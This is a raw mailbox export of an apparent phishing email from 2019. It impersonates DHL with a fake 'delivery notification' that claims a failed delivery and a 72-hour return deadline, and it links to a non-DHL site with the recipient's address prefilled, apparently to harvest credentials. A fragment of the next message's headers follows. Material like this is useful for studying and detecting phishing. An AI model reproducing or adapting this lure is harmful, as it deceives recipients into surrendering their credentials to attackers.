From: DHL International <Paitoon.K@dld.go.th>
To: jose@monkey.org
Subject: jose@monkey.org DELIVERY NOTIFICATION.
Date: 17 Jan 2019 20:18:43 -0800
Message-ID: <20190117201843.3AD8E832891B7B09@dld.go.th>
MIME-Version: 1.0
Content-Type: multipart/related;
	boundary="----=_NextPart_000_0012_0306C35E.4C3C881D"
X-PMX-Version: 6.4.3.2751440, Antispam-Engine: 2.7.2.2107409, Antispam-Data: 2019.1.18.41216, AntiVirus-Engine: 5.56.0, AntiVirus-Data: 2019.1.11.5560000
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 12


------=_NextPart_000_0012_0306C35E.4C3C881D
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

   <td colspan=3D"2" class=3D"readmsg">


<h1><span style=3D"FONT-FAMILY: Tahoma">
<div>
<div class=3D"left"><a class=3D"aa" target=3D"_blank" title=3D"Home" href=
=3D"http://spartanfinancials.com/DHL/index.php?email=3Djose@monkey.org"><im=
g title=3D"DHL" alt=3D"DHL" src=3D"cid:dhllogo.gif" width=3D"134" height=3D=
"42"></a></div></div></span></h1><span style=3D"FONT-FAMILY: Tahoma"><font =
size=3D"2">
<div>DELIVERY NOTIFICATION,<br><br>Dear jose, <br>We attempted to deliver y=
our item at 10:10 AM on Jan 17, 2019.
<br>The delivery attempt failed because nobody was present at the shipping =
address, so this notification has been automatically sent.
<br>If the parcel is not scheduled for redelivery or picked up within 72 ho=
urs, it will be returned to the sender.
<div><br>
Label Number: DHL7567351D
<div>
Expected Delivery Date: Jan 17, 2019
<div>Recipient Email: jose@monkey.org
<br>=20
Class: Package Services
<div>
Service(s): Delivery Confirmation
<div>
Status: eNotification sent=20
<div>
<br><a class=3D"aa" target=3D"_blank" href=3D"http://spartanfinancials.com/=
DHL/index.php?email=3Djose@monkey.org">Click Here To Confirm Shipping Addre=
ss </a><br><br>Thank You For Helping Us Serve You.</div>
<div>
<div><span>2019 =A9 DHL Customer Service. All rights reserved.</span></div>=
</div></font></span>
</td>
------=_NextPart_000_0012_0306C35E.4C3C881D
Content-Type: image/gif; name="dhllogo.gif"
Content-Transfer-Encoding: base64
Content-ID: <dhllogo.gif>

R0lGODlhhgAqAKIAANkzAM8NAPmyAN9NAOlyAPKZAMwAAP/MACH5BAAAAAAALAAAAACGACoA
AAP/eLrc/jDKSau9OOvNu/9gKI5kaZ5oqq5s675wLM90bd94ru987//AoFA4MBiPyKTyGBgI
IIQl8qkoSI9UwNVI6Fm34GSAyhAEtl2FGa2IbgG9dXhuDDi0V/gCL9XLpWM9fHRzBQxFV4EK
iIBPAoNLhjyMhHNpB19XZJlSVJRLAz4Fo6SlpqduUml/SwAErwRnV2mpfUMHAgQAu7y9DJBI
isCVSH6yjbefSXoHtUqSysRMWWCSQs5iVKxJoZjSV9Bg3ULbSdbRRsbfS2mcrWRBw0fjVaej
2vb5+qQLAvsF8FjkgkWwYMED6Jj0WtiLii6GvhY8hLhrD8WLELsY3PiKgIKASgD8reNWpVo/
k81GTvtoyeM/UwLKSesmc16/Y6DUqDwC8GUpCu62hJJHKMAlogaYHUDKLOjMpYQuRfDn8wk2
YiElblGUMhGZmnRCUvUJEOicMU7DOimDEhcYqbgG4CwqshLcW3jz6t3Lt6/fv4ADCx5MuLDh
w4gTK17MWEgCADs=

------=_NextPart_000_0012_0306C35E.4C3C881D--


From jose@monkey.org Sun Jan 20 07:33:05 2019 +0000
Return-Path: lmcdevitt@ohlone.edu
Delivered-To: jose@monkey.org
X-FDA: 75072684330.01.fold42_5533abe643813
X-Spam-Summary: 53,3.2,0,f0269f0783c7fc54,d41d8cd98f00b204,lmcdevitt@ohlone.edu,:lmcdevitt@ohlone.edu,RULES_HIT:4:10:41:72:355:379:474:582:599:960:962:967:973:978:983:988:989:1152:1158:1189:1208:1221:1260:1313:1314:1345:1359:1381:1431:1433:1434:1436:1437:1516:1517:1518:1567:1571:1575:1588:1589:1592:1594:1710:1714:1730:1776:1792:1803:2194:2198:2199:2200:2525:2527:2528:2539:2559:2564:2610:2639:2682:2685:2693:2741:2859:2890:2899:2900:2902:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3586:3867:3868:3871:3872:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4321:4552:4605:5007:6117:6630:6650:6658:6669:6678:6703:8512:8518:8603:8784:8957:9025:9111:9121:9411:9908:10008:10214:10314:10346:11473:11656:11657:11658:11788:11914:12043:12050:12438:12519:12555:12657:12658:12659:12660:12661:12986:13139:13146:13163:13229:13230:13237:14141:14659:21080:21349:21433:21450:21451:21483:21627:21740:21810:21819:21881:30001:30022:30054:30070:30091,0,RBL:63.128.21.151:@ohlone.
X-HE-Tag: fold42_5533abe643813
X-Filterd-Recvd-Size: 16867
Received: from us-smtp-delivery-151.mimecast.com (us-smtp-delivery-151.mimecast.com [63.128.21.151])
	by imf05.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Sun, 20 Jan 2019 07:33:05 +0000 (UTC)
Received: from F04WITNESS3.admin.ohlone.edu (207.62.190.197
 [207.62.190.197]) (Using TLS) by relay.mimecast.com with ESMTP id
 us-mta-116-3iDcDM5VMbyqi5e2H-UDrA-9; Sun, 20 Jan 2019 02:32:58 -0500
Received: from f04mbx3.admin.ohlone.edu ([fe80::45f1:3ab:5ec5:f99f]) by
 F04WITNESS3.admin.ohlone.edu ([::1]) with mapi id 14.03.0389.001; Sat, 19 Jan
 2019 23:25:54 -0800
